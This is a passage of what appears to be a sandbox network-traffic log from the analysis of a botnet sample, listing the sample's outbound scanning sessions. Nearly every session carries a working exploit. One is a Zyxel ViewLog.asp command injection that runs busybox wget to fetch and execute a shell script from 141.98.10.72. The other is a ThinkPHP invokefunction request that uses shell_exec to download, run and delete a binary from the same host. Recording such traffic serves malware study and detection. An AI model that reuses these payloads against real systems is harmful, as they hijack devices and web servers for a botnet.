                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.920576096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      79192.168.2.154839094.131.113.328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.676199913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:03.920831919 CET47INHTTP/1.1 400 Bad Request
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      80192.168.2.154695095.213.194.2068080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.677047014 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:04.033205986 CET1286INHTTP/1.1 500 Server Error
                                                      Date: Wed, 14 Feb 2024 08:29:03 GMT
                                                      X-Content-Type-Options: nosniff
                                                      Content-Type: text/html;charset=utf-8
                                                      Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                      Cache-Control: no-cache,no-store,must-revalidate
                                                      X-Hudson-Theme: default
                                                      Referrer-Policy: same-origin
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Set-Cookie: JSESSIONID.e3e8558e=node02px8ovnem08wv6yl1s578sz28548.node0; Path=/; HttpOnly
                                                      X-Hudson: 1.395
                                                      X-Jenkins: 2.396
                                                      X-Jenkins-Session: 5190ba09
                                                      X-Frame-Options: sameorigin
                                                      Content-Encoding: gzip
                                                      X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAny9bQMI8mDV7xdd68MEmdE7lMoS2X9VPOeiOEuCqI4IVT3/QgfP732Cl3X1xyxCVbLi0CRoMQkPXmjXPyD9yyX8R/48EsEU75thF23wXByoICM+bILy9O1dkHmWxRC6LAJA88GxraI+v0Bw3XgdrnHt43wpS5fJCHncKtgE2gPoiaESBJnJuE6pwwF8gfQ96qRZIhpaQnsKeDV52PKCnZUfPPxezIcT8Jz+uz9ZRYyQ/m9bxnq+YhJ/QMp9TKW9tyuUS9K9VzPN1wQESmvsQ+NQ1aJYcAKx74WnCf4nuvRcOkUIbTd6lQqpD36M09m5h4IOMiWKTwafDA5c4qKb2TQIDAQAB
                                                      Content-Length: 2169
                                                      Connection: close
                                                      Server: Jetty(10.0.13)
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 ff b5 59 eb 6e e3 36 16 fe df a7 60 35 58 cc 8f 96 ba db b2 67 6d 2f e6 56 74 8a 6c 53 4c 66 6f 58 2c 0c 4a a2 2d 26 92 a8 92 94 9d f4 69 f6 59 fa 64 3d 24 25 5b ce 38 89 33 9e 06 30 45 91 87 1f 0f cf 39 3c fc a8 7c 83 d0 37 08 cd be 7d 77 f9 f6 d3 7f 7e 79 8f 0a 55 95 8b 59 57 52 92 23 41 e5 3f 3e 5e cc 1d 4f 2a a2 58 e6 8d 82 a9 9f 12 7f ea a0 9c 28 82 05 e7 aa 15 e5 dc e9 df a9 34 af 0f 88 d3 5b 45 6b c9 78 2d 31 d9 10 56 92 b4 a4 73 47 89 96 76 02 6d cd 14 56 54 aa b9 b3 22 a5 ec 9b 59 45 d6 0f 20 7b b6 af 13 cc 44 5b a5 58 6b 4e c5 dc f9 89 d6 37 0c e6 7a ab 5b 0f 24 36 a4 6c 61 e6 28 f1 47 24 89 68 3a a6 d3 cc 9f 44 f1 6a 9a 04 31 e0 86 63 0a 5d 50 ae 12 7f 1a 85 e1 8a 8c 69 36 0d c6 fe 78 12 24 a3 74 94 4f 92 f1 24 1f 3b 0b b0 9e 31 21 14 a6
                                                      Data Ascii: Yn6`5Xgm/VtlSLfoX,J-&iYd=$%[830E9<|7}w~yUYWR#A?>^O*X(4[Ekx-1VsGvmVT"YE {D[XkN7z[$6la(G$h:Dj1c]Pi6x$tO$;1!


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      81192.168.2.155646885.184.184.2428080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.677591085 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      82192.168.2.1539236112.168.50.10080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.691468954 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:03.967278004 CET512INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 345
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 17:09:46 GMT
                                                      Server: lighttpd/1.4.55
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      83192.168.2.1538690112.184.60.5180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.705439091 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:03.993036985 CET339INHTTP/1.0 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:28:59 GMT
                                                      Server: Boa/0.94.14rc21
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      84192.168.2.155647494.121.119.368080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.737587929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      85192.168.2.153726694.123.251.438080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.737806082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      86192.168.2.155757894.121.33.518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.737998009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      87192.168.2.153544294.120.252.2158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.740561962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      88192.168.2.154080694.183.153.1248080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.957417011 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:04.282186031 CET339INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:34 GMT
                                                      Server: Boa/0.94.14rc21
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      89192.168.2.155910695.154.77.138080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.965981960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      90192.168.2.1553568112.47.11.21080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.983740091 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:04.329677105 CET193INHTTP/1.1 404 Not Found
                                                      Content-Length: 0
                                                      X-NWS-LOG-UUID: 14817034343562233346
                                                      Connection: close
                                                      Server: Lego Server
                                                      Date: Wed, 14 Feb 2024 08:29:04 GMT
                                                      X-Cache-Lookup: Return Directly
                                                      Feb 14, 2024 09:29:04.507008076 CET1INData Raw: 0d
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      91192.168.2.153277894.123.148.488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.570008993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      92192.168.2.155103294.123.54.1988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.570029974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      93192.168.2.154376462.219.113.638080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.572169065 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      94192.168.2.155911695.101.142.19480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.592924118 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:05.794887066 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:05 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 65 38 65 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 35 26 23 34 36 3b 31 39 38 63 32 66 35 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;be8e655f&#46;1707899345&#46;198c2f57</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      95192.168.2.156049495.110.224.25080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.609108925 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:05.827336073 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:04 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      96192.168.2.155139295.216.114.3280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.609447002 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:05.827677965 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.20.1
                                                      Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
